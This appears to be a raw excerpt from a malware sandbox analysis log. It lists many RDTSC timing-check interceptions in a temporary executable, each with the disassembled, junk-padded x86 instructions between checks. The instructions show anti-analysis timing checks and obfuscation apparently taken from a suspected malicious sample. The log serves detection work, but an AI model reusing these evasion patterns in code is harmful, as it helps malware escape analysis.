Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE08EC second address: 4EE0997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7FDCFD229Eh 0x0000000f push eax 0x00000010 jmp 00007F7FDCFD229Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7FDCFD22A4h 0x0000001d adc eax, 5AE53CD8h 0x00000023 jmp 00007F7FDCFD229Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F7FDCFD22A8h 0x0000002f and si, 0738h 0x00000034 jmp 00007F7FDCFD229Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d jmp 00007F7FDCFD22A6h 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0997 second address: 4EE099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE099B second address: 4EE09A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE09A1 second address: 4EE09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE09B0 second address: 4EE09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E9005A second address: 4E90060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90060 second address: 4E90064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90064 second address: 4E90072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90072 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov bx, si 0x00000008 popad 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7FDCFD22A9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90099 second address: 4E900D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F7FDD3F186Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7FDD3F1877h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E900D8 second address: 4E90160 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7FDCFD22A8h 0x00000008 xor ecx, 5D52DEE8h 0x0000000e jmp 00007F7FDCFD229Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7FDCFD22A8h 0x0000001c jmp 00007F7FDCFD22A5h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 jmp 00007F7FDCFD229Eh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7FDCFD22A7h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90160 second address: 4E90202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDD3F186Fh 0x00000009 sub si, C19Eh 0x0000000e jmp 00007F7FDD3F1879h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F7FDD3F186Dh 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 mov cx, B4F3h 0x00000025 jmp 00007F7FDD3F1878h 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+10h] 0x0000002e pushad 0x0000002f push esi 0x00000030 mov edx, 4B985C10h 0x00000035 pop edi 0x00000036 mov cl, 06h 0x00000038 popad 0x00000039 push esp 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e mov dx, si 0x00000041 popad 0x00000042 mov dword ptr [esp], esi 0x00000045 pushad 0x00000046 mov ecx, 04CA2617h 0x0000004b mov di, si 0x0000004e popad 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7FDD3F1875h 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90202 second address: 4E90208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90208 second address: 4E90232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F7FDD3F186Bh 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90232 second address: 4E90284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 sub eax, 3C4271DEh 0x0000000f jmp 00007F7FDCFD22A9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7FDCFD229Ah 0x00000020 adc cl, FFFFFFD8h 0x00000023 jmp 00007F7FDCFD229Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b mov dl, cl 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90284 second address: 4E902BA instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 73AC8AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b jmp 00007F7FDD3F186Dh 0x00000010 test esi, esi 0x00000012 jmp 00007F7FDD3F186Eh 0x00000017 je 00007F804F90FBCFh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, edx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902BA second address: 4E902C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902C9 second address: 4E902CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902CD second address: 4E902E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 push edx 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902E5 second address: 4E90317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 je 00007F804F90FBA4h 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 push ecx 0x00000012 mov dx, F31Ah 0x00000016 pop edi 0x00000017 popad 0x00000018 mov edx, dword ptr [esi+44h] 0x0000001b jmp 00007F7FDD3F186Eh 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90317 second address: 4E9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E9031B second address: 4E90338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90338 second address: 4E90375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F7FDCFD229Eh 0x00000014 jne 00007F804F4F05BDh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7FDCFD229Ah 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90375 second address: 4E9037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E9037B second address: 4E90399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 mov eax, edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90399 second address: 4E903A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903A1 second address: 4E903C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F804F4F058Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7FDCFD22A4h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903C4 second address: 4E903CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903CA second address: 4E903CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903CE second address: 4E903D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80739 second address: 4E80789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f mov edi, 6120FAA4h 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F7FDCFD229Fh 0x00000021 and ax, AABEh 0x00000026 jmp 00007F7FDCFD22A9h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80789 second address: 4E807A4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, 7B0F88A0h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7FDD3F186Bh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E807A4 second address: 4E80884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 jmp 00007F7FDCFD22A8h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7FDCFD229Eh 0x0000001e or eax, 531267A8h 0x00000024 jmp 00007F7FDCFD229Bh 0x00000029 popfd 0x0000002a jmp 00007F7FDCFD22A8h 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F7FDCFD229Bh 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 jmp 00007F7FDCFD22A4h 0x0000003d pushfd 0x0000003e jmp 00007F7FDCFD22A2h 0x00000043 or esi, 0E2B4F98h 0x00000049 jmp 00007F7FDCFD229Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov esi, dword ptr [ebp+08h] 0x00000053 pushad 0x00000054 push eax 0x00000055 pushad 0x00000056 popad 0x00000057 pop ebx 0x00000058 popad 0x00000059 mov ebx, 00000000h 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F7FDCFD229Fh 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80884 second address: 4E8088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E8088A second address: 4E8088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E8088E second address: 4E809B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007F7FDD3F1876h 0x00000012 je 00007F804F91733Dh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F7FDD3F186Eh 0x0000001f sub si, DEB8h 0x00000024 jmp 00007F7FDD3F186Bh 0x00000029 popfd 0x0000002a mov di, si 0x0000002d popad 0x0000002e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000035 jmp 00007F7FDD3F1872h 0x0000003a mov ecx, esi 0x0000003c pushad 0x0000003d mov esi, 035B51ADh 0x00000042 pushfd 0x00000043 jmp 00007F7FDD3F186Ah 0x00000048 add esi, 528BF848h 0x0000004e jmp 00007F7FDD3F186Bh 0x00000053 popfd 0x00000054 popad 0x00000055 je 00007F804F9172E8h 0x0000005b jmp 00007F7FDD3F1876h 0x00000060 test byte ptr [77436968h], 00000002h 0x00000067 jmp 00007F7FDD3F1870h 0x0000006c jne 00007F804F9172C8h 0x00000072 jmp 00007F7FDD3F1870h 0x00000077 mov edx, dword ptr [ebp+0Ch] 0x0000007a jmp 00007F7FDD3F1870h 0x0000007f xchg eax, ebx 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 jmp 00007F7FDD3F186Dh 0x00000088 pushfd 0x00000089 jmp 00007F7FDD3F1870h 0x0000008e xor ecx, 4247E298h 0x00000094 jmp 00007F7FDD3F186Bh 0x00000099 popfd 0x0000009a popad 0x0000009b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E809B2 second address: 4E80A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDCFD229Fh 0x00000009 or cl, 0000005Eh 0x0000000c jmp 00007F7FDCFD22A9h 0x00000011 popfd 0x00000012 mov si, 1827h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7FDCFD22A6h 0x00000021 sbb si, D688h 0x00000026 jmp 00007F7FDCFD229Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A1B second address: 4E80A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A1F second address: 4E80A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A25 second address: 4E80A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A2B second address: 4E80A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A2F second address: 4E80A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007F7FDD3F1878h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A56 second address: 4E80A93 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F7FDCFD22A8h 0x00000010 pop esi 0x00000011 call 00007F7FDCFD229Bh 0x00000016 pop eax 0x00000017 popad 0x00000018 push ebx 0x00000019 mov bx, si 0x0000001c pop ecx 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A93 second address: 4E80AB4 instructions: 0x00000000 rdtsc 0x00000002 mov bx, C7FAh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7FDD3F1873h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80AB4 second address: 4E80AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80AB9 second address: 4E80AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7FDD3F1875h 0x0000000a add cl, FFFFFFD6h 0x0000000d jmp 00007F7FDD3F1871h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push dword ptr [ebp+10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80B16 second address: 4E80B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDCFD229Fh 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F7FDCFD22A5h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 movzx esi, bx 0x00000019 pushad 0x0000001a mov edx, 3BF4B8DAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80B51 second address: 4E80B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 pushad 0x00000009 mov ecx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D17 second address: 4E90D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D1D second address: 4E90D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D21 second address: 4E90D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDCFD22A4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D40 second address: 4E90D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDD3F1871h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90A0B second address: 4E90A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F7FDCFD22A0h 0x00000012 pushfd 0x00000013 jmp 00007F7FDCFD22A2h 0x00000018 or si, 4AF8h 0x0000001d jmp 00007F7FDCFD229Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esp], ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F10841 second address: 4F10847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F10847 second address: 4F1084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3131C2 second address: 3131C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00A54 second address: 4F00A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 22h 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7FDCFD22A8h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7FDCFD22A7h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00A92 second address: 4F00AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7FDD3F1874h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00AB7 second address: 4F00ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00ABD second address: 4F00ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F0097E second address: 4F0098D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA00E9 second address: 4EA012B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov dx, cx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7FDD3F1877h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA012B second address: 4EA0148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0148 second address: 4EA0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0158 second address: 4EA0188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7FDCFD22A6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx esi, dx 0x00000019 rdtsc
